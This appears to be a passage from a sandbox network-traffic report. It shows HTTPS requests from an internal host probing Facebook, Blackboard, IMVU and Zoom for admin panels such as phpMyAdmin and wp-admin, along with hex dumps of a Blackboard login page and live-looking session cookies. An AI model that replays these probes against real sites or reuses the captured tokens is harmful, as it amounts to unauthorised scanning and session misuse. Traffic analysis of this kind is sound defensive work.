                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC15208INData Raw: 33 62 36 30 0d 0a 3c 21 2d 2d 20 54 68 69 73 20 6c 6f 67 69 6e 2e 6a 73 70 20 66 69 6c 65 20 69 73 20 74 61 67 67 65 64 20 77 69 74 68 20 63 6f 6d 6d 65 6e 74 73 20 69 64 65 6e 74 69 66 79 69 6e 67 20 73 65 63 74 69 6f 6e 73 20 66 6f 72 20 65 61 73 79 20 65 64 69 74 69 6e 67 20 2d 2d 3e 0a 0a 3c 21 2d 2d 20 54 68 69 73 20 73 65 63 74 69 6f 6e 20 62 65 6c 6f 77 20 63 61 6c 6c 73 20 76 61 72 69 6f 75 73 20 73 65 72 76 6c 65 74 73 20 66 72 6f 6d 20 74 68 65 20 4c 65 61 72 6e 20 65 6e 76 69 72 6f 6e 6d 65 6e 74 20 20 61 6e 64 20 6f 74 68 65 72 20 74 68 69 6e 67 73 20 79 6f 75 20 64 6f 6e 27 74 20 77 61 6e 74 20 74 6f 20 74 6f 75 63 68 2e 20 44 6f 20 6e 6f 74 20 64 65 6c 65 74 65 20 61 6e 79 74 68 69 6e 67 20 69 6e 20 74 68 69 73 20 73 65 63 74 69 6f 6e 20 2d
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 3b60... This login.jsp file is tagged with comments identifying sections for easy editing -->... This section below calls various servlets from the Learn environment and other things you don't want to touch. Do not delete anything in this section -
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC16384INData Raw: 65 30 31 66 0d 0a 69 73 65 2c 4d 4f 3a 69 2e 5f 41 2e 4d 75 74 61 74 69 6f 6e 4f 62 73 65 72 76 65 72 2c 46 45 54 43 48 3a 69 2e 5f 41 2e 66 65 74 63 68 7d 29 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 63 28 65 2c 74 29 7b 6c 65 74 20 72 3d 61 28 29 3b 72 2e 69 6e 69 74 69 61 6c 69 7a 65 64 41 67 65 6e 74 73 3f 3f 3d 7b 7d 2c 74 2e 69 6e 69 74 69 61 6c 69 7a 65 64 41 74 3d 7b 6d 73 3a 28 30 2c 6e 2e 7a 29 28 29 2c 64 61 74 65 3a 6e 65 77 20 44 61 74 65 7d 2c 72 2e 69 6e 69 74 69 61 6c 69 7a 65 64 41 67 65 6e 74 73 5b 65 5d 3d 74 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 29 7b 6c 65 74 20 74 3d 61 28 29 3b 72 65 74 75 72 6e 20 74 2e 69 6e 69 74 69 61 6c 69 7a 65 64 41 67 65 6e 74 73 3f 2e 5b 65 5d 7d 66 75 6e 63 74 69 6f 6e 20 64 28 65 2c 74 29 7b 61 28 29 5b 65 5d
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e01fise,MO:i._A.MutationObserver,FETCH:i._A.fetch}),e}function c(e,t){let r=a();r.initializedAgents??={},t.initializedAt={ms:(0,n.z)(),date:new Date},r.initializedAgents[e]=t}function u(e){let t=a();return t.initializedAgents?.[e]}function d(e,t){a()[e]
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC16384INData Raw: 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 53 48 4f 52 54 43 55 54 20 49 43 4f 4e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0a 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 75 69 2d 75 6c 74 72 61 2f 63 73 73 2f 75 6c 74 72 61 2e 63 73 73 3f 76 3d 33 39 30 30 2e 38 34 2e 30 2d 72 65 6c 2e 33 31 2b 61 65 64 66 66 38 32 22 20 69 64 3d 22 63 73 73 5f 30 22 3e 0a 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 75 69 2d 75 6c 74 72 61 2f 63 73 73 2f 6d 75 6c 74 69 5f 66 61
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <link rel="SHORTCUT ICON" type="image/x-icon" href="/favicon.ico"> <link rel="stylesheet" type="text/css" href="/ui-ultra/css/ultra.css?v=3900.84.0-rel.31+aedff82" id="css_0"> <link rel="stylesheet" type="text/css" href="/ui-ultra/css/multi_fa
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC16384INData Raw: b8 a5 61 72 72 61 6d 2c e1 b9 a2 61 66 61 72 2c 52 61 62 c4 ab ca bf 5c 27 61 6c 2d 41 77 77 61 6c 2c 52 61 62 c4 ab ca bf 5c 27 61 74 68 2d 54 68 c4 81 6e c4 ab 2c 4a 75 6d c4 81 64 c4 81 5c 27 61 6c 2d c5 aa 6c c4 81 2c 4a 75 6d c4 81 64 c4 81 5c 27 61 74 68 2d 54 68 c4 81 6e 69 79 61 2c 52 61 6a 61 62 2c 53 68 61 ca bf 62 c4 81 6e 2c 52 61 6d 61 e1 b8 8d c4 81 6e 2c 53 68 61 77 77 c4 81 6c 2c 44 68 c5 ab 5c 27 61 6c 2d 51 61 ca bf 64 61 2c 44 68 c5 ab 5c 27 61 6c 2d e1 b8 a4 69 6a 6a 61 27 3b 0a 20 20 20 20 4c 4f 43 41 4c 45 5f 53 45 54 54 49 4e 47 53 5b 27 4c 4f 43 41 4c 45 5f 53 45 54 54 49 4e 47 53 2e 47 52 45 45 54 49 4e 47 27 5d 20 3d 20 27 42 69 65 6e 76 65 6e 69 64 6f 2c 20 7b 31 7d 27 3b 0a 20 20 20 20 4c 4f 43 41 4c 45 5f 53 45 54 54 49 4e 47
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: arram,afar,Rab\'al-Awwal,Rab\'ath-Thn,Jumd\'al-l,Jumd\'ath-Thniya,Rajab,Shabn,Raman,Shawwl,Dh\'al-Qada,Dh\'al-ijja'; LOCALE_SETTINGS['LOCALE_SETTINGS.GREETING'] = 'Bienvenido, {1}'; LOCALE_SETTING
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC16384INData Raw: 20 64 65 6c 65 74 65 43 6f 6f 6b 69 65 28 22 4a 53 45 53 53 49 4f 4e 49 44 22 2c 20 22 2f 64 65 70 6c 6f 79 6d 65 6e 74 22 2c 20 6e 75 6c 6c 2c 20 74 72 75 65 29 3b 0d 0a 20 20 20 20 20 20 64 65 6c 65 74 65 43 6f 6f 6b 69 65 28 22 4a 53 45 53 53 49 4f 4e 49 44 22 2c 20 22 2f 63 6f 6e 74 65 6e 74 5f 61 72 65 61 22 2c 20 6e 75 6c 6c 2c 20 74 72 75 65 29 3b 0d 0a 20 20 20 20 20 20 64 65 6c 65 74 65 43 6f 6f 6b 69 65 28 22 4a 53 45 53 53 49 4f 4e 49 44 22 2c 20 22 2f 70 6f 72 74 66 6f 6c 69 6f 22 2c 20 6e 75 6c 6c 2c 20 74 72 75 65 29 3b 0d 0a 20 20 20 20 20 20 64 65 6c 65 74 65 43 6f 6f 6b 69 65 28 22 4a 53 45 53 53 49 4f 4e 49 44 22 2c 20 22 2f 65 76 69 64 65 6e 63 65 5f 61 72 65 61 22 2c 20 6e 75 6c 6c 2c 20 74 72 75 65 29 3b 0d 0a 20 20 20 20 20 20 64 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: deleteCookie("JSESSIONID", "/deployment", null, true); deleteCookie("JSESSIONID", "/content_area", null, true); deleteCookie("JSESSIONID", "/portfolio", null, true); deleteCookie("JSESSIONID", "/evidence_area", null, true); de
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC12563INData Raw: 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 66 61 2d 6d 6f 64 61 6c 2d 74 69 74 6c 65 22 3e 0a 20 20 20 20 20 20 3c 68 31 20 69 64 3d 22 6d 66 61 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 2d 74 69 74 6c 65 22 20 3e 41 75 74 65 6e 74 69 63 61 63 69 c3 b3 6e 20 64 65 20 6d c3 ba 6c 74 69 70 6c 65 73 20 66 61 63 74 6f 72 65 73 3c 2f 68 31 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 76 65 72 69 66 69 63 61 74 69 6f 6e 2d 6d 6f 64 61 6c 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 20 63 6c 61 73 73 3d 22 76 65 72 69 66 69 63 61 74 69 6f 6e 2d 6d 6f 64 61 6c 2d 62 6f 64 79 2d 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0a 20 20 20 20 20 20 20 20 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 74 6f 74 70 2d 76 65 72 69 66 69 63
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <div class="mfa-modal-title"> <h1 id="mfa-verification-title" >Autenticacin de mltiples factores</h1> </div> <div class="verification-modal-body"> <div class="verification-modal-body-description"> <label for="totp-verific


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                123192.168.2.66339431.13.65.1443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC179OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: hi-in.facebook.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC389INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Location: https://m.facebook.com/PhpMyAdmin/?locale=hi_IN&_rdr
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=15552000; preload
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset="utf-8"
                                                                                                                                                                                                                                                                                                                                                                X-FB-Debug: R+jhCoHhnj8OxysF9L4pXjhY2TqO7WfajgtzEngAyNynLoq0eLQHwFQMuJ9Qwg0wJiXZoXcLd/p4Ahd/LaLupw==
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:08 GMT
                                                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                124192.168.2.66315844.195.133.145443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC334OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ucv.blackboard.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: AWSELB=75CBFFD512C5775942CE3BA2F04D8690E53FBAB74472C5F492A4B3BEA18CC7421A779A020EDDAF7B9110B0A46B575850AB86F0E3E0AEC9356593FDDBE1D721FD3E4C0BAB24
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC1165INHTTP/1.1 200
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://ucv.blackboard.com
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Content-Language: es-ES
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'self'
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html;charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:08 GMT
                                                                                                                                                                                                                                                                                                                                                                Expires: Sun, 05 Feb 2023 11:16:08 GMT
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Thu, 05 Feb 2004 11:16:08 GMT
                                                                                                                                                                                                                                                                                                                                                                P3P: CP="CAO PSA OUR"
                                                                                                                                                                                                                                                                                                                                                                Pragma: private
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: JSESSIONID=E41B23B8FE75D2739726BB1165CA0934; Path=/; Secure
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: BbRouter=expires:1707142568,id:446E98E312C73E260FE257940BB8F838,signature:27310f316af6195334c1d86b89c65000c4d2c30782f5bbb59aeb5b46e56fe9f2,site:6c65ed46-3830-485d-a4b2-aea1e7764ad4,v:2,xsrf:16555f0a-6176-4660-9dae-094bfc8e1899; Path=/; Secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                X-Blackboard-appserver: ip-10-146-255-211.ec2.internal
                                                                                                                                                                                                                                                                                                                                                                X-Blackboard-product: Blackboard Learn &#8482; 3900.84.0-rel.31+aedff82
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1
                                                                                                                                                                                                                                                                                                                                                                transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: Close
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC15208INData Raw: 33 62 36 30 0d 0a 3c 21 2d 2d 20 54 68 69 73 20 6c 6f 67 69 6e 2e 6a 73 70 20 66 69 6c 65 20 69 73 20 74 61 67 67 65 64 20 77 69 74 68 20 63 6f 6d 6d 65 6e 74 73 20 69 64 65 6e 74 69 66 79 69 6e 67 20 73 65 63 74 69 6f 6e 73 20 66 6f 72 20 65 61 73 79 20 65 64 69 74 69 6e 67 20 2d 2d 3e 0a 0a 3c 21 2d 2d 20 54 68 69 73 20 73 65 63 74 69 6f 6e 20 62 65 6c 6f 77 20 63 61 6c 6c 73 20 76 61 72 69 6f 75 73 20 73 65 72 76 6c 65 74 73 20 66 72 6f 6d 20 74 68 65 20 4c 65 61 72 6e 20 65 6e 76 69 72 6f 6e 6d 65 6e 74 20 20 61 6e 64 20 6f 74 68 65 72 20 74 68 69 6e 67 73 20 79 6f 75 20 64 6f 6e 27 74 20 77 61 6e 74 20 74 6f 20 74 6f 75 63 68 2e 20 44 6f 20 6e 6f 74 20 64 65 6c 65 74 65 20 61 6e 79 74 68 69 6e 67 20 69 6e 20 74 68 69 73 20 73 65 63 74 69 6f 6e 20 2d
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 3b60... This login.jsp file is tagged with comments identifying sections for easy editing -->... This section below calls various servlets from the Learn environment and other things you don't want to touch. Do not delete anything in this section -
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC16384INData Raw: 37 66 66 38 0d 0a 69 73 65 2c 4d 4f 3a 69 2e 5f 41 2e 4d 75 74 61 74 69 6f 6e 4f 62 73 65 72 76 65 72 2c 46 45 54 43 48 3a 69 2e 5f 41 2e 66 65 74 63 68 7d 29 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 63 28 65 2c 74 29 7b 6c 65 74 20 72 3d 61 28 29 3b 72 2e 69 6e 69 74 69 61 6c 69 7a 65 64 41 67 65 6e 74 73 3f 3f 3d 7b 7d 2c 74 2e 69 6e 69 74 69 61 6c 69 7a 65 64 41 74 3d 7b 6d 73 3a 28 30 2c 6e 2e 7a 29 28 29 2c 64 61 74 65 3a 6e 65 77 20 44 61 74 65 7d 2c 72 2e 69 6e 69 74 69 61 6c 69 7a 65 64 41 67 65 6e 74 73 5b 65 5d 3d 74 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 29 7b 6c 65 74 20 74 3d 61 28 29 3b 72 65 74 75 72 6e 20 74 2e 69 6e 69 74 69 61 6c 69 7a 65 64 41 67 65 6e 74 73 3f 2e 5b 65 5d 7d 66 75 6e 63 74 69 6f 6e 20 64 28 65 2c 74 29 7b 61 28 29 5b 65 5d
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 7ff8ise,MO:i._A.MutationObserver,FETCH:i._A.fetch}),e}function c(e,t){let r=a();r.initializedAgents??={},t.initializedAt={ms:(0,n.z)(),date:new Date},r.initializedAgents[e]=t}function u(e){let t=a();return t.initializedAgents?.[e]}function d(e,t){a()[e]
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC16384INData Raw: 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 53 48 4f 52 54 43 55 54 20 49 43 4f 4e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0a 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 75 69 2d 75 6c 74 72 61 2f 63 73 73 2f 75 6c 74 72 61 2e 63 73 73 3f 76 3d 33 39 30 30 2e 38 34 2e 30 2d 72 65 6c 2e 33 31 2b 61 65 64 66 66 38 32 22 20 69 64 3d 22 63 73 73 5f 30 22 3e 0a 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 75 69 2d 75 6c 74 72 61 2f 63 73 73 2f 6d 75 6c 74 69 5f 66 61
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <link rel="SHORTCUT ICON" type="image/x-icon" href="/favicon.ico"> <link rel="stylesheet" type="text/css" href="/ui-ultra/css/ultra.css?v=3900.84.0-rel.31+aedff82" id="css_0"> <link rel="stylesheet" type="text/css" href="/ui-ultra/css/multi_fa
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC16384INData Raw: 34 30 32 66 0d 0a 75 e1 b8 a5 61 72 72 61 6d 2c e1 b9 a2 61 66 61 72 2c 52 61 62 c4 ab ca bf 5c 27 61 6c 2d 41 77 77 61 6c 2c 52 61 62 c4 ab ca bf 5c 27 61 74 68 2d 54 68 c4 81 6e c4 ab 2c 4a 75 6d c4 81 64 c4 81 5c 27 61 6c 2d c5 aa 6c c4 81 2c 4a 75 6d c4 81 64 c4 81 5c 27 61 74 68 2d 54 68 c4 81 6e 69 79 61 2c 52 61 6a 61 62 2c 53 68 61 ca bf 62 c4 81 6e 2c 52 61 6d 61 e1 b8 8d c4 81 6e 2c 53 68 61 77 77 c4 81 6c 2c 44 68 c5 ab 5c 27 61 6c 2d 51 61 ca bf 64 61 2c 44 68 c5 ab 5c 27 61 6c 2d e1 b8 a4 69 6a 6a 61 27 3b 0a 20 20 20 20 4c 4f 43 41 4c 45 5f 53 45 54 54 49 4e 47 53 5b 27 4c 4f 43 41 4c 45 5f 53 45 54 54 49 4e 47 53 2e 47 52 45 45 54 49 4e 47 27 5d 20 3d 20 27 42 69 65 6e 76 65 6e 69 64 6f 2c 20 7b 31 7d 27 3b 0a 20 20 20 20 4c 4f 43 41 4c 45
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 402fuarram,afar,Rab\'al-Awwal,Rab\'ath-Thn,Jumd\'al-l,Jumd\'ath-Thniya,Rajab,Shabn,Raman,Shawwl,Dh\'al-Qada,Dh\'al-ijja'; LOCALE_SETTINGS['LOCALE_SETTINGS.GREETING'] = 'Bienvenido, {1}'; LOCALE
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC16384INData Raw: 3b 0d 0a 20 20 20 20 20 20 64 65 6c 65 74 65 43 6f 6f 6b 69 65 28 22 4a 53 45 53 53 49 4f 4e 49 44 22 2c 20 22 2f 64 65 70 6c 6f 79 6d 65 6e 74 22 2c 20 6e 75 0d 0a 33 66 62 31 0d 0a 6c 6c 2c 20 74 72 75 65 29 3b 0d 0a 20 20 20 20 20 20 64 65 6c 65 74 65 43 6f 6f 6b 69 65 28 22 4a 53 45 53 53 49 4f 4e 49 44 22 2c 20 22 2f 63 6f 6e 74 65 6e 74 5f 61 72 65 61 22 2c 20 6e 75 6c 6c 2c 20 74 72 75 65 29 3b 0d 0a 20 20 20 20 20 20 64 65 6c 65 74 65 43 6f 6f 6b 69 65 28 22 4a 53 45 53 53 49 4f 4e 49 44 22 2c 20 22 2f 70 6f 72 74 66 6f 6c 69 6f 22 2c 20 6e 75 6c 6c 2c 20 74 72 75 65 29 3b 0d 0a 20 20 20 20 20 20 64 65 6c 65 74 65 43 6f 6f 6b 69 65 28 22 4a 53 45 53 53 49 4f 4e 49 44 22 2c 20 22 2f 65 76 69 64 65 6e 63 65 5f 61 72 65 61 22 2c 20 6e 75 6c 6c 2c 20
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ; deleteCookie("JSESSIONID", "/deployment", nu3fb1ll, true); deleteCookie("JSESSIONID", "/content_area", null, true); deleteCookie("JSESSIONID", "/portfolio", null, true); deleteCookie("JSESSIONID", "/evidence_area", null,
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC12579INData Raw: 69 6f 6e 2d 74 69 74 6c 65 22 20 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 66 61 2d 6d 6f 64 61 6c 2d 74 69 74 6c 65 22 3e 0a 20 20 20 20 20 20 3c 68 31 20 69 64 3d 22 6d 66 61 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 2d 74 69 74 6c 65 22 20 3e 41 75 74 65 6e 74 69 63 61 63 69 c3 b3 6e 20 64 65 20 6d c3 ba 6c 74 69 70 6c 65 73 20 66 61 63 74 6f 72 65 73 3c 2f 68 31 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 76 65 72 69 66 69 63 61 74 69 6f 6e 2d 6d 6f 64 61 6c 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 20 63 6c 61 73 73 3d 22 76 65 72 69 66 69 63 61 74 69 6f 6e 2d 6d 6f 64 61 6c 2d 62 6f 64 79 2d 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0a 20 20 20 20 20 20 20 20 3c 6c 61 62 65 6c 20 66
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ion-title" > <div class="mfa-modal-title"> <h1 id="mfa-verification-title" >Autenticacin de mltiples factores</h1> </div> <div class="verification-modal-body"> <div class="verification-modal-body-description"> <label f


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                125192.168.2.66397654.183.63.241443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC223OUTGET /admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: pt.secure.imvu.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: osCsid=a1aabfac7a1f7e8705602ed881881037
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC384INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.17.9
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.4
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                x-imvu-rnd: cE3wuo3TA1SD1
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                126192.168.2.663427170.114.52.4443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC383OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: us04web.zoom.us
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: __cf_bm=1iAg.jaqOry6c7AW1l9FRRQzGRAhyUaJmOXCMdnuwVs-1707131767-1-AXN1T055F/0qPV5xho0c5Hp5aAPUnzpxyaVcvCdaYwqNFgvDA63Qh9s5qsoOO8s0XQO1pfqrAc0csWoMqMsU+Ok=
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: http://us04web.zoom.us/wp-login.php
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1350INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                x-zm-trackingid: v=2.0;clid=us04;rid=WEB_c5bf5ac2aebc8892112b64213b1f192d
                                                                                                                                                                                                                                                                                                                                                                x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                                                                                                content-security-policy: upgrade-insecure-requests; default-src https://*.zoom.us https://zoom.us blob: 'self'; img-src https: about: blob: data: 'self'; style-src https: safari-extension: chrome-extension: 'unsafe-inline' data: 'self'; font-src https: safari-extension: chrome-extension: blob: data: 'self'; connect-src * about: blob: data: 'self'; media-src * rtmp: blob: data: 'self'; frame-src https: ms-appx-web: zoommtg: zoomus: wvjbscheme: zoomprc: data: blob: 'self'; object-src 'none'; base-uri 'none';script-src 'self' 'strict-dynamic' 'nonce-smzSSlJ9TB-BNoLtyBrhWQ' 'unsafe-inline' blob: https:;
                                                                                                                                                                                                                                                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                set-cookie: zm_aid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                set-cookie: zm_haid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                set-cookie: zm_tmaid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                set-cookie: zm_htmaid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnly
